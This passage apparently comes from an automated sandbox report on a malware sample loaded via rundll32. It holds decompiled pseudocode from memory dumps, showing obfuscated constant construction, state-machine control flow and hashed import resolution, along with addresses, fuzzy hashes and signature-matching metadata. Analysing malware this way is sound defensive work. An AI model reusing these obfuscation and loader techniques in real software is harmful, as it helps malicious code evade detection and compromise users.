				_v32 = _v32 ^ 0x0004e941;
				_v24 = 0xa461;
				_v24 = _v24 >> 0xd;
				_t172 = 0x2a;
				_v24 = _v24 / _t172;
				_v24 = _v24 * 0x41;
				_v24 = _v24 ^ 0x00004365;
				_v64 = 0x6361;
				_t173 = 0x6a;
				_t174 =  &_v328;
				_v64 = _v64 / _t173;
				_v64 = _v64 ^ 0x00000cc9;
				_v56 = 0x48bf;
				_v56 = _v56 ^ 0x5ae3b612;
				_v56 = _v56 ^ 0x5ae38705;
				_v44 = 0xaf17;
				_v44 = _v44 | 0xd3b2bd8d;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x7657b8ea;
				while(1) {
					_t161 =  *_t193;
					if(_t161 == 0) {
						break;
					}
					if(_t161 == 0x2e) {
						 *_t174 = 0;
					} else {
						 *_t174 = _t161;
						_t174 = _t174 + 1;
						_t193 = _t193 + 1;
						continue;
					}
					L6:
					_t194 = E00205719(_v40, _v68, _v36,  &_v328, _v12);
					_t196 = _t195 + 0xc;
					if(_t194 != 0) {
						L8:
						_t164 = E00200EAE(_t193 + 1, _v28, _v52, _v60, _v32);
						_push(_v44);
						_push(_v56);
						_push(_t194);
						_push(_v64);
						return E001F2419(_v24, _t164 ^ 0x165fe069);
					}
					_t167 = E00208DF5( &_v328, _v16, _v8, _v48, _v20);
					_t194 = _t167;
					_t196 = _t196 + 0xc;
					if(_t194 != 0) {
						goto L8;
					}
					return _t167;
				}
				goto L6;
			}

0x0020c6b6
0x0020c6bf
0x0020c6c6
0x0020c6cd
0x0020c6d4
0x0020c6db
0x0020c6df
0x0020c6e6
0x0020c6ed
0x0020c6f1
0x0020c6f5
0x0020c6fc
0x0020c703
0x0020c707
0x0020c716
0x0020c718
0x0020c71b
0x0020c722
0x0020c729
0x0020c72d
0x0020c734
0x0020c73b
0x0020c742
0x0020c749
0x0020c74d
0x0020c754
0x0020c75b
0x0020c762
0x0020c769
0x0020c770
0x0020c77a
0x0020c77f
0x0020c784
0x0020c78e
0x0020c793
0x0020c798
0x0020c79f
0x0020c7a9
0x0020c7ae
0x0020c7b3
0x0020c7ba
0x0020c7c1
0x0020c7c8
0x0020c7cf
0x0020c7d6
0x0020c7dd
0x0020c7e4
0x0020c7eb
0x0020c7f2
0x0020c7f9
0x0020c7fd
0x0020c804
0x0020c80b
0x0020c812
0x0020c817
0x0020c81e
0x0020c821
0x0020c82a
0x0020c834
0x0020c837
0x0020c83d
0x0020c840
0x0020c847
0x0020c84e
0x0020c855
0x0020c85c
0x0020c863
0x0020c86a
0x0020c86e
0x0020c87f
0x0020c87f
0x0020c883
0x00000000
0x00000000
0x0020c879
0x0020c887
0x0020c87b
0x0020c87b
0x0020c87d
0x0020c87e
0x00000000
0x0020c87e
0x0020c88a
0x0020c8a2
0x0020c8a4
0x0020c8a9
0x0020c8cb
0x0020c8da
0x0020c8df
0x0020c8e7
0x0020c8ec
0x0020c8ed
0x00000000
0x0020c8f8
0x0020c8bd
0x0020c8c2
0x0020c8c4
0x0020c8c9
0x00000000
0x00000000
0x0020c900
0x0020c900
0x00000000

Strings

]8g, xrefs: 0020C7B3
Ulx8, xrefs: 0020C754

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Ulx8$]8g
API String ID: 0-1828074717
Opcode ID: 5efb796bbd5c0bd0a1b08533b1cf97a22a6e006468b28043f05add0be14b9d1a
Instruction ID: 88c9b40a31419294d1769023150432dd7891e1b1c1ae9d87a668282bd8d84c88
Opcode Fuzzy Hash: 5efb796bbd5c0bd0a1b08533b1cf97a22a6e006468b28043f05add0be14b9d1a
Instruction Fuzzy Hash: 8C614571D0131AEBEF09CFA4D84A5EEBBB2FF04314F208158D411B62A4D7B91A19CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002ABC21, Relevance: 2.6, Strings: 2, Instructions: 148COMMON

Download Yara Rule

Strings

]8g, xrefs: 002ABD27
Ulx8, xrefs: 002ABCC8

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Ulx8$]8g
API String ID: 0-1828074717
Opcode ID: 5efb796bbd5c0bd0a1b08533b1cf97a22a6e006468b28043f05add0be14b9d1a
Instruction ID: 6000aab42239a514a7c0c08e341089eda631e1c42ce9f0af4787a2df9f70327d
Opcode Fuzzy Hash: 5efb796bbd5c0bd0a1b08533b1cf97a22a6e006468b28043f05add0be14b9d1a
Instruction Fuzzy Hash: 28616471D0120AEBEF09CFA5D84A5EEBFB2FF49314F208159D411B62A0D7B91A19CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0020CAA0, Relevance: 2.6, Strings: 2, Instructions: 147
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0020CAA0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t121;
				void* _t139;
				void* _t143;
				void* _t145;
				void* _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int* _t174;

				_push(_a16);
				_t165 = _a4;
				_t143 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t121);
				_v88 = 0xa345;
				_t174 =  &(( &_v96)[6]);
				_t166 = 0;
				_t145 = 0x388706b5;
				_t167 = 0x17;
				_v88 = _v88 / _t167;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0xb586a132;
				_v88 = _v88 ^ 0xb586a8c9;
				_v68 = 0x3c18;
				_t168 = 0x75;
				_v68 = _v68 / _t168;
				_v68 = _v68 | 0xfaaa2e7e;
				_v68 = _v68 ^ 0xfaaa5d3e;
				_v72 = 0x292c;
				_t169 = 0x30;
				_v72 = _v72 / _t169;
				_t170 = 0x7d;
				_v72 = _v72 / _t170;
				_v72 = _v72 ^ 0x00000df9;
				_v64 = 0xacd5;
				_v64 = _v64 + 0x8377;
				_v64 = _v64 ^ 0x00014058;
				_v92 = 0x91f4;
				_v92 = _v92 ^ 0x59127442;
				_v92 = _v92 ^ 0xd1a3ee64;
				_v92 = _v92 ^ 0x1200e02f;
				_v92 = _v92 ^ 0x9ab1bc65;
				_v76 = 0x8653;
				_v76 = _v76 | 0x93bc935f;
				_v76 = _v76 << 4;
				_v76 = _v76 ^ 0x3bc90d53;
				_v96 = 0x9841;
				_t171 = 0x42;
				_v96 = _v96 / _t171;
				_v96 = _v96 * 0x19;
				_v96 = _v96 * 0x44;
				_v96 = _v96 ^ 0x000f441a;
				_v56 = 0xfe3f;
				_v56 = _v56 + 0xc16;
				_v56 = _v56 ^ 0x000102f3;
				_v60 = 0xb3bd;
				_v60 = _v60 + 0xffff84e2;
				_v60 = _v60 ^ 0x0000629b;
				_v80 = 0x779;
				_v80 = _v80 << 0xa;
				_v80 = _v80 << 2;
				_v80 = _v80 | 0x746c3a89;
				_v80 = _v80 ^ 0x747fb8a8;
				_v84 = 0x97f4;
				_v84 = _v84 ^ 0xacb5c4e6;
				_v84 = _v84 * 0x15;
				_v84 = _v84 | 0x645395ef;
				_v84 = _v84 ^ 0x6edfb60f;
				do {
					while(_t145 != 0x10d238e9) {
						if(_t145 == 0x13bcd39c) {
							_t139 = E0020D290(_v64, _v92, _v76, _t165, _v96,  &_v52);
							_t174 =  &(_t174[4]);
							__eflags = _t139;
							if(__eflags != 0) {
								_t145 = 0x30fa29dc;
								continue;
							}
						} else {
							if(_t145 == 0x30fa29dc) {
								__eflags = E001F9899(_t165 + 4, _v56, __eflags,  &_v52, _v60, _v80, _v84);
								_t166 =  !=  ? 1 : _t166;
							} else {
								if(_t145 != 0x388706b5) {
									goto L9;
								} else {
									_t145 = 0x10d238e9;
									continue;
								}
							}
						}
						L12:
						return _t166;
					}
					E0020F3E9(_v88, _v68, _v72, _t143,  &_v52);
					_t174 =  &(_t174[3]);
					_t145 = 0x13bcd39c;
					L9:
					__eflags = _t145 - 0x2a61d71f;
				} while (__eflags != 0);
				goto L12;
			}

0x0020caa7
0x0020caae
0x0020cab2
0x0020cab4
0x0020cabb
0x0020cac2
0x0020cac3
0x0020cac4
0x0020cac5
0x0020caca
0x0020cad2
0x0020cadb
0x0020cadd
0x0020cae4
0x0020cae9
0x0020caef
0x0020caf4
0x0020cafc
0x0020cb04
0x0020cb10
0x0020cb15
0x0020cb1b
0x0020cb23
0x0020cb2b
0x0020cb37
0x0020cb3c
0x0020cb46
0x0020cb4b
0x0020cb51
0x0020cb59
0x0020cb61
0x0020cb69
0x0020cb71
0x0020cb79
0x0020cb81
0x0020cb89
0x0020cb91
0x0020cb99
0x0020cba1
0x0020cba9
0x0020cbae
0x0020cbb6
0x0020cbc2
0x0020cbc5
0x0020cbce
0x0020cbd7
0x0020cbdb
0x0020cbe3
0x0020cbeb
0x0020cbf3
0x0020cbfb
0x0020cc03
0x0020cc0b
0x0020cc13
0x0020cc1b
0x0020cc20
0x0020cc2a
0x0020cc32
0x0020cc3a
0x0020cc42
0x0020cc4f
0x0020cc53
0x0020cc5b
0x0020cc63
0x0020cc63
0x0020cc6d
0x0020cc99
0x0020cc9e
0x0020cca1
0x0020cca3
0x0020cca5
0x00000000
0x0020cca5
0x0020cc6f
0x0020cc75
0x0020ccf8
0x0020ccfa
0x0020cc77
0x0020cc7d
0x00000000
0x0020cc7f
0x0020cc7f
0x00000000
0x0020cc7f
0x0020cc7d
0x0020cc75
0x0020ccfe
0x0020cd06
0x0020cd06
0x0020ccbe
0x0020ccc3
0x0020ccc6
0x0020cccb
0x0020cccb
0x0020cccb
0x00000000

Strings

,), xrefs: 0020CB2B
/, xrefs: 0020CB89

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,)$/
API String ID: 0-233899039
Opcode ID: 4ad18bab273ac8b3cf774fb827cc12b4d9418481b084281fa1ae0e97bf415739
Instruction ID: 1baed7f181cc1c204456e3a79af9be636219d22eed9b72539b261eadc87d4137
Opcode Fuzzy Hash: 4ad18bab273ac8b3cf774fb827cc12b4d9418481b084281fa1ae0e97bf415739
Instruction Fuzzy Hash: DA5186B1508341AFE354CF21C489A2BBBE0FBC8748F50891EF496962A1D775DA59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002AC014, Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

/, xrefs: 002AC0FD
,), xrefs: 002AC09F

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,)$/
API String ID: 0-233899039
Opcode ID: 4db9be1474db6f518ebeacc3650c6420d9380aa2d8be28ef6ad77c5300495aa3
Instruction ID: 5c5e5d955694719f358f233b8de0cdce1f50a69896289a751bafe3767f6e601d
Opcode Fuzzy Hash: 4db9be1474db6f518ebeacc3650c6420d9380aa2d8be28ef6ad77c5300495aa3
Instruction Fuzzy Hash: 62518571508341AFD354CF21C489A1BBBE1FBC9348F50891EF896962A1D775DA198F82

Uniqueness

Uniqueness Score: -1.00%

Function 001F56B3, Relevance: 2.6, Strings: 2, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E001F56B3(void* __edx, char _a4, signed short _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* __ecx;
				void* _t84;
				void* _t91;
				signed short _t97;
				signed short _t98;
				signed short _t99;
				signed int _t101;
				signed int _t102;
				intOrPtr _t111;
				signed short _t113;
				signed short* _t116;
				signed short _t117;
				signed short _t119;
				signed int* _t121;

				_t99 = _a8;
				_push(_a12);
				_push(_t99);
				_push(_a4);
				_push(__edx);
				E001F56B2(_t84);
				_a8 = 0xbb3c;
				_t121 =  &(( &_v24)[5]);
				_a8 = _a8 + 0xffff0478;
				_a8 = _a8 << 0xb;
				_a8 = _a8 + 0xfffffb27;
				_a8 = _a8 ^ 0xfdfd9b26;
				_v16 = 0x694e;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0xffffd888;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0xf6f4b2b2;
				_v4 = 0xcfd5;
				_t101 = 0x77;
				_v4 = _v4 / _t101;
				_v4 = _v4 ^ 0x00007af6;
				_v20 = 0x3853;
				_v20 = _v20 + 0x2f57;
				_v20 = _v20 << 0xc;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x33d5042f;
				_v24 = 0x48cf;
				_v24 = _v24 >> 4;
				_v24 = _v24 + 0xa5d7;
				_v24 = _v24 ^ 0x227c1387;
				_v24 = _v24 ^ 0x227cf043;
				_v8 = 0x820c;
				_v8 = _v8 * 0x4e;
				_v8 = _v8 * 0x1d;
				_v8 = _v8 ^ 0x047d7705;
				_v12 = 0x55c9;
				_v12 = _v12 + 0xffff6fb2;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0xff8ad068;
				_t102 = _a8;
				_t91 =  *((intOrPtr*)(_t99 + 0x3c)) + _t99;
				_t111 =  *((intOrPtr*)(_t91 + 0x78 + _t102 * 8));
				if(_t111 == 0 ||  *((intOrPtr*)(_t91 + 0x7c + _t102 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t117 = _t111 + _t99;
					while(1) {
						_t94 =  *((intOrPtr*)(_t117 + 0xc));
						if( *((intOrPtr*)(_t117 + 0xc)) == 0) {
							goto L13;
						}
						_t113 = E00208DF5(_t94 + _t99, _v16, _v4, _v20, _v24);
						_t121 =  &(_t121[3]);
						_a8 = _t113;
						__eflags = _t113;
						if(_t113 == 0) {
							L15:
							return 0;
						}
						_t116 =  *_t117 + _t99;
						_t119 =  *((intOrPtr*)(_t117 + 0x10)) + _t99;
						while(1) {
							_t97 =  *_t116;
							__eflags = _t97;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t105 = _t99 + 2 + _t97;
								__eflags = _t99 + 2 + _t97;
							} else {
								_t105 = _t97 & 0x0000ffff;
							}
							_t98 = E001FCDD0(_t105, _v8, _v12, _t113);
							__eflags = _t98;
							if(_t98 == 0) {
								goto L15;
							} else {
								_t113 = _a8;
								_t116 =  &(_t116[2]);
								 *_t119 = _t98;
								_t119 =  &_a4;
								__eflags = _t119;
								continue;
							}
						}
						_t117 = _t117 + 0x14;
						__eflags = _t117;
					}
					goto L13;
				}
			}

0x001f56b7
0x001f56be
0x001f56c2
0x001f56c3
0x001f56c7
0x001f56c9
0x001f56ce
0x001f56d6
0x001f56d9
0x001f56e3
0x001f56e8
0x001f56f0
0x001f56f8
0x001f5700
0x001f5705
0x001f570d
0x001f5712
0x001f571a
0x001f5728
0x001f572b
0x001f572f
0x001f5737
0x001f573f
0x001f5747
0x001f574c
0x001f5751
0x001f5759
0x001f5761
0x001f5766
0x001f576e
0x001f5776
0x001f577e
0x001f578b
0x001f5794
0x001f5798
0x001f57a0
0x001f57a8
0x001f57b0
0x001f57b5
0x001f57c0
0x001f57c4
0x001f57c6
0x001f57cc
0x001f5847
0x00000000
0x001f57d5
0x001f57d5
0x001f5840
0x001f5840
0x001f5845
0x00000000
0x00000000
0x001f57f2
0x001f57f4
0x001f57f7
0x001f57fb
0x001f57fd
0x001f5852
0x00000000
0x001f5852
0x001f5804
0x001f5806
0x001f5837
0x001f5837
0x001f5839
0x001f583b
0x00000000
0x00000000
0x001f580a
0x001f5814
0x001f5814
0x001f580c
0x001f580c
0x001f580c
0x001f581f
0x001f5826
0x001f5828
0x00000000
0x001f582a
0x001f582a
0x001f582e
0x001f5831
0x001f5834
0x001f5834
0x00000000
0x001f5834
0x001f5828
0x001f583d
0x001f583d
0x001f583d
0x00000000
0x001f5840

Strings

Ni, xrefs: 001F56F8
W/, xrefs: 001F573F

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Ni$W/
API String ID: 0-111194442
Opcode ID: ce07b1ab16d3e2f26c795e08b7096ef518bbb2213e0d655af138487974276c43
Instruction ID: e90116704c6d1d7700e9687dde07f574778129a17a3760d3343d46db25009a78
Opcode Fuzzy Hash: ce07b1ab16d3e2f26c795e08b7096ef518bbb2213e0d655af138487974276c43
Instruction Fuzzy Hash: 604175B15087428FD314DF25C88482BBBF2FBD4758F514A2CFA9596261E774DA09CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00294C27, Relevance: 2.6, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

W/, xrefs: 00294CB3
Ni, xrefs: 00294C6C

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Ni$W/
API String ID: 0-111194442
Opcode ID: 915cb36f3d96f2d15476d1dd5d5133e4a4cf0e4116c8a4ff49e5a3dd4fb2ff51
Instruction ID: 4a9abcdb599477f8336c6cbf504721970040d77574f06a8550a49cb346c8ca0b
Opcode Fuzzy Hash: 915cb36f3d96f2d15476d1dd5d5133e4a4cf0e4116c8a4ff49e5a3dd4fb2ff51
Instruction Fuzzy Hash: F54187B15183429FDB54EF24C88481BBBF1FBD4718F504A2CF88596261E774DA1ACFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0020DD78, Relevance: 2.6, Strings: 2, Instructions: 80
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0020DD78(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t69;
				void* _t73;
				void* _t76;
				intOrPtr _t79;
				signed int* _t81;

				_t73 = __ecx;
				_t81 =  &_v40;
				_v8 = 0x1b7700;
				_t79 = 0;
				_v4 = 0;
				_t76 = 0xdac552c;
				_v16 = 0x3c26;
				_v16 = _v16 | 0x2b145b71;
				_v16 = _v16 ^ 0x2b14102b;
				_v40 = 0xd45e;
				_v40 = _v40 ^ 0x28d15431;
				_v40 = _v40 * 0xf;
				_v40 = _v40 | 0xf1f7d666;
				_v40 = _v40 ^ 0xf5f7dcd7;
				_v20 = 0xc134;
				_v20 = _v20 ^ 0xfce9bf97;
				_v20 = _v20 ^ 0xfce94421;
				_v24 = 0x60c0;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00000a32;
				_v12 = 0x6ec6;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x000ddcb5;
				_v28 = 0xb783;
				_v28 = _v28 + 0x4382;
				_v28 = _v28 + 0xd9fc;
				_v28 = _v28 ^ 0x0001ab03;
				_v36 = 0xe117;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 | 0x4f01522f;
				_v36 = _v36 + 0xffffd003;
				_v36 = _v36 ^ 0x4f014085;
				_v32 = 0xf8b3;
				_v32 = _v32 * 0x65;
				_v32 = _v32 + 0xc87a;
				_v32 = _v32 ^ 0x0062f8e1;
				do {
					while(_t76 != 0x15fecb3) {
						if(_t76 == 0xdac552c) {
							_t76 = 0x15fecb3;
							continue;
						} else {
							if(_t76 != 0x172cce4b) {
								goto L8;
							} else {
								_t79 = _t79 + E001F7544(_v12, _v28, _v36, _t73 + 4, _v32);
							}
						}
						L5:
						return _t79;
					}
					_t69 = E001F7E30();
					_t81 = _t81 - 0xc + 0xc;
					_t76 = 0x172cce4b;
					_t79 = _t79 + _t69;
					L8:
				} while (_t76 != 0x1c39a7d);
				goto L5;
			}

0x0020dd78
0x0020dd78
0x0020dd7b
0x0020dd86
0x0020dd8d
0x0020dd91
0x0020dd93
0x0020dda0
0x0020dda8
0x0020ddb0
0x0020ddb8
0x0020ddcb
0x0020ddcf
0x0020ddd7
0x0020dddf
0x0020dde7
0x0020ddef
0x0020ddf7
0x0020ddff
0x0020de04
0x0020de0c
0x0020de14
0x0020de19
0x0020de21
0x0020de29
0x0020de31
0x0020de39
0x0020de41
0x0020de49
0x0020de4e
0x0020de56
0x0020de5e
0x0020de66
0x0020de73
0x0020de77
0x0020de7f
0x0020de87
0x0020de87
0x0020de8d
0x0020debb
0x00000000
0x0020de8f
0x0020de91
0x00000000
0x0020de93
0x0020deaf
0x0020deaf
0x0020de91
0x0020deb2
0x0020deba
0x0020deba
0x0020ded2
0x0020ded7
0x0020deda
0x0020dedc
0x0020dede
0x0020dede
0x00000000

Strings

2, xrefs: 0020DE04
&<, xrefs: 0020DD93

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &<$2
API String ID: 0-12532211
Opcode ID: 840e47962e3d73477b89a5bfd9ac43b6a925a88084486f6c4384313c70dfcef2
Instruction ID: 6cb0cad54c9383953b3dfebab2d2f2ad05c8b4b429fb73991a1ffdd1dba6793f
Opcode Fuzzy Hash: 840e47962e3d73477b89a5bfd9ac43b6a925a88084486f6c4384313c70dfcef2
Instruction Fuzzy Hash: E53144719093428BD314DF65DA8A40FBBF1BBE4718F104A2DF485A6261D7B9CA098F87

Uniqueness

Uniqueness Score: -1.00%

Function 002AD2EC, Relevance: 2.6, Strings: 2, Instructions: 80COMMON

Download Yara Rule

Strings

&<, xrefs: 002AD307
2, xrefs: 002AD378

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &<$2
API String ID: 0-12532211
Opcode ID: 840e47962e3d73477b89a5bfd9ac43b6a925a88084486f6c4384313c70dfcef2
Instruction ID: 1e7932fbf9a683b6b5292d78d7b03c5b33bb5a5ee27ec07dd1f7e435c7133a03
Opcode Fuzzy Hash: 840e47962e3d73477b89a5bfd9ac43b6a925a88084486f6c4384313c70dfcef2
Instruction Fuzzy Hash: 313137719193428FD314CF25D58A40FFBE1BBD4718F108A2DF486A6260D7B9DA198F87

Uniqueness

Uniqueness Score: -1.00%

Function 0022303C, Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

d.#, xrefs: 002231FF, 00223316

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID:
String ID: d.#
API String ID: 0-436191920
Opcode ID: 2413691d6da1a4b787ac22ff1dc187a4e4aaeecd0c0f1ef30fda2067429a548c
Instruction ID: b080d660f3212ca8de9356a30a9535ebc95e7c77d7f520dd60b2c09f597cb98b
Opcode Fuzzy Hash: 2413691d6da1a4b787ac22ff1dc187a4e4aaeecd0c0f1ef30fda2067429a548c
Instruction Fuzzy Hash: 1BB18071A20259FFCB15EFA8E996AADB3F5EB59300F5540A4F404AB251CB34AF61CB10

Uniqueness

Uniqueness Score: -1.00%

Function 002A7F6A, Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

I)F?, xrefs: 002A80B6

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: I)F?
API String ID: 0-3766579322
Opcode ID: 58e8262642812f8f937493fdc0641b859ee5197d23890abd25909d5302e7d4eb
Instruction ID: 90cbd9fe926317289d991fd0ae603cf467712ab823240ff24d66c6fe9e95382f
Opcode Fuzzy Hash: 58e8262642812f8f937493fdc0641b859ee5197d23890abd25909d5302e7d4eb
Instruction Fuzzy Hash: 5D81E0B250024CEBEF59DF65C9498CE3BA2FF44348F009219FE15962A0D7BAD959CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00203D7C, Relevance: 1.4, Strings: 1, Instructions: 171
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00203D7C(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				short _v108;
				char* _v112;
				char* _v116;
				signed int _v120;
				char _v124;
				char _v644;
				char _v1164;
				void* __ecx;
				void* _t185;
				signed int _t212;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				void* _t250;

				_push(_a12);
				_t250 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001F56B2(_t185);
				_v84 = _v84 & 0x00000000;
				_v80 = _v80 & 0x00000000;
				_v92 = 0x2af249;
				_v88 = 0xa239d;
				_v72 = 0x3311;
				_v72 = _v72 | 0x7bf224ce;
				_v72 = _v72 ^ 0x7bf237de;
				_v36 = 0xf7a4;
				_v36 = _v36 + 0xffffc682;
				_v36 = _v36 + 0xffffc2a9;
				_v36 = _v36 ^ 0x000086db;
				_v68 = 0xdbd1;
				_v68 = _v68 + 0xcfce;
				_v68 = _v68 ^ 0x0001a39f;
				_v12 = 0x5909;
				_v12 = _v12 + 0x65b0;
				_v12 = _v12 >> 1;
				_v12 = _v12 + 0xffff8c6d;
				_v12 = _v12 ^ 0xfffff7ad;
				_v44 = 0x56e3;
				_v44 = _v44 + 0x126;
				_t216 = 9;
				_v44 = _v44 / _t216;
				_v44 = _v44 ^ 0x00003ea1;
				_v8 = 0x9ec;
				_t217 = 0xc;
				_v8 = _v8 / _t217;
				_t218 = 0xf;
				_v8 = _v8 / _t218;
				_v8 = _v8 ^ 0x5389c1c6;
				_v8 = _v8 ^ 0x53898368;
				_v56 = 0x8b50;
				_t219 = 0x7c;
				_v56 = _v56 * 0x7b;
				_v56 = _v56 ^ 0x0042a85f;
				_v64 = 0xa08d;
				_v64 = _v64 + 0xcc80;
				_v64 = _v64 ^ 0x00016541;
				_v40 = 0x6173;
				_v40 = _v40 | 0xc384fcd4;
				_v40 = _v40 << 0xf;
				_v40 = _v40 ^ 0x7efba2ce;
				_v24 = 0xc6dd;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffff231a;
				_v24 = _v24 ^ 0x00179bda;
				_v48 = 0xc35f;
				_v48 = _v48 << 0xc;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 ^ 0x00004803;
				_v32 = 0xc90e;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x0001a766;
				_v76 = 0x4072;
				_v76 = _v76 / _t219;
				_v76 = _v76 ^ 0x00003c70;
				_v28 = 0x9423;
				_v28 = _v28 + 0xffff4e74;
				_t220 = 0x19;
				_v28 = _v28 * 0x2e;
				_v28 = _v28 ^ 0xfffa9c10;
				_v16 = 0x38cb;
				_v16 = _v16 ^ 0x15f5157f;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0xf435;
				_v16 = _v16 ^ 0x7d4c407a;
				_v52 = 0x39bb;
				_v52 = _v52 + 0xffffae06;
				_v52 = _v52 ^ 0xce0d0fc0;
				_v52 = _v52 ^ 0x31f2a856;
				_v60 = 0xc52f;
				_t221 = 0x65;
				_v60 = _v60 / _t220;
				_v60 = _v60 ^ 0x00004cfc;
				_v20 = 0xe49b;
				_v20 = _v20 + 0xf3d2;
				_v20 = _v20 / _t221;
				_v20 = _v20 ^ 0x00007d6c;
				E001F1CB3( &_v124, _v12, 0x1e, _v44);
				E001F1CB3( &_v644, _v8, 0x208, _v56);
				E001F1CB3( &_v1164, _v64, 0x208, _v40);
				E00205891(_a12,  &_v644, _v24, _v48, _v32);
